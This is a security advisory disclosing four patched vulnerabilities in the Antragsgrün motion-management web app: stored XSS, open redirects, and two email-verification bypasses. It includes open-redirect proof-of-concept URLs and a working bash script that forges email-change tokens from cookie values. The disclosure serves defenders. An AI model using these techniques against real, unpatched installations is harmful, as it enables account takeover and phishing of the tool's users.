NEWS
X41 D-Sec GmbH Security Advisory: X41-2024-002
Multiple Vulnerabilities in Antragsgrün
Highest Severity Rating: High
Version: 4.14.0
Confirmed Affected Versions: Commit 9c1ab3ca391eb66023b30d45e87c24589367ab6c
Confirmed Patched Versions: 4.14.2
Vendor: Tobias Hößl
Vendor URL: https://antragsgruen.de/
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2024-002-antragsgruen/
Summary and Impact
X41 identified a stored XSS issue that can be triggered from unauthenticated users to attack administrative users in Antragruen and allows performing actions as administrative users. Additionally, issues which circumvent the email verification process were identified.
Product Description
From the vendor homepage:
Antragsgrün offers a clear and efficient tool for the effective administration of resolutions, motions, amendments, and candidacies: from the submission of motions to the vote and the drafting of the resolution.
Many organizations are already using the tool successfully such as the European Youth Forum, the German and European Green Party, and the National Council of German Women’s Organizations. It can be easily adapted to a variety of scenarios.
Stored XSS in Motion Reason
Severity Rating: High
Vector: XSS
CVE: CVE-2024-46884
CWE: 80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
CVSS Score: 9.6
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Analysis
Anonymous users are often allowed to create new motions in Antragsgruen. When creating these, it is possible to go back and edit the motion via https://antragsgruen/std/motionname-id/edit. There is an optional field reason
, which is not properly filtered against XSS attacks. The reason
is passed via parameter sections[10]
to the application and can be used for XSS injections. The XSS triggers when an administrator handles the motion and allows normal users to hijack the administrator’s session. Another way to trigger the XSS after the publication is when visiting the HTML view via https://antragsgruen/std/motionname-id/plainhtml
Other fields are not filtered either when using the edit endpoint.
Proof of Concept
Tamper the submitted data at https://antragsgruen/std/motionname-id/edit
Workarounds
Only allow registered users to submit motions to mitigate the attack vector to some extent.
Open Redirect in Login and Logout
Severity Rating: Medium
Vector: Open URL redirect
CVE: CVE-2024-46882
CWE: 601 - URL Redirection to Untrusted Site
CVSS Score: 6.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Analysis
Two open URL redirects were discovered in the web application. The logout redirect will instantly redirect the user to an attacker-controlled webpage, which makes phishing attacks easier. An attacker can send a link to a user of the application, potentially having them believe they are opening the application when it will, in fact, redirect them to a page controlled by the attacker. The page could pretend to be Antragsgruen’s login page, or another page that suits the attacker’s goal.
Proof of Concept
https://antragsgruen/logout?backUrl=https://x41-dsec.de
https://antragsgruen/login?backUrl=https://x41-dsec.de
Workarounds
No workaround is currently known.
Email Verification Bypass After Sign-up
Severity Rating: Medium
Vector: Authentication
CVE: CVE-2024-46883
CWE: 287 - Improper Authentication
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Credit: X41 D-Sec GmbH, Yassine El Baaj
Analysis
After users sign up, they are redirected to a page where they are expected to enter a code that has been sent per email to validate their account. This can be bypassed by simply clicking on another component of the user interface, the home button for example. The user is essentially logged in before completing the verification step. In addition to that, X41 noticed that browsing the application with a non-verified account did not have an impact on its functionality. Meaning that a non-verified user could do anything a verified one could also do.
Workaround
No workaround is currently known.
Email Verification Bypass After Email Change
Severity Rating:
Vector: Email Verification
CVE: CVE-2024-46883
CWE: 345 - Insufficient Verification of Data Authenticity
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Credit: X41 D-Sec GmbH, Yassine El Baaj, JM
Analysis
When a user requests a change of their email address, a random code is sent to the new address which they have to enter in order to prove access to the new address. This code is generated in createEmailChangeToken()
in models/db/User.php
as follows:
public function createEmailChangeToken(string $newEmail, int $timestamp): string
{
// [...]
$key = $newEmail . $timestamp . $this->id . $this->authKey;
return substr(sha1($key), 0, 10);
}
All of the components are known to the user. The id
and authKey
are static values from the database and part of the _identity
cookie.
This makes it trivial for a user to generate the required code and change the email address to an address they don’t have access to.
Proof of Concept
X41 has successfully used the following script to generate the required code given the desired email address, the server’s Date
response header, and values from the _identity
cookie.
#!/bin/bash
read -rp 'Email to change to: ' email
read -rp 'Date header value: ' datestr
read -rp 'User ID (first entry of _identity cookie array): ' id
read -rp 'AuthKey (second entry, including \u0000s: ' authkey
dateint=$(date -d "$datestr" +%s)
raw="${email}${dateint}${id}${authkey}"
alt_raw="${email}$((dateint-1))${id}${authkey}"
echo ---
echo -ne "exact time:\t"
echo -ne "$raw" | sha1sum | head -c 10
echo
echo -ne "minus 1s:\t"
echo -ne "$alt_raw" | sha1sum | head -c 10
echo
Workarounds
No workaround is currently known.
Timeline
2024-07-24 Issue identified
2024-08-27 Vendor contacted
2024-08-27 Vendor reply
2024-09-08 Fixed version released
2024-09-09 Advisory release
2024-09-09 CVE ID Requested
2024-09-12 CVE ID Assigned
About X41 D-Sec GmbH
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.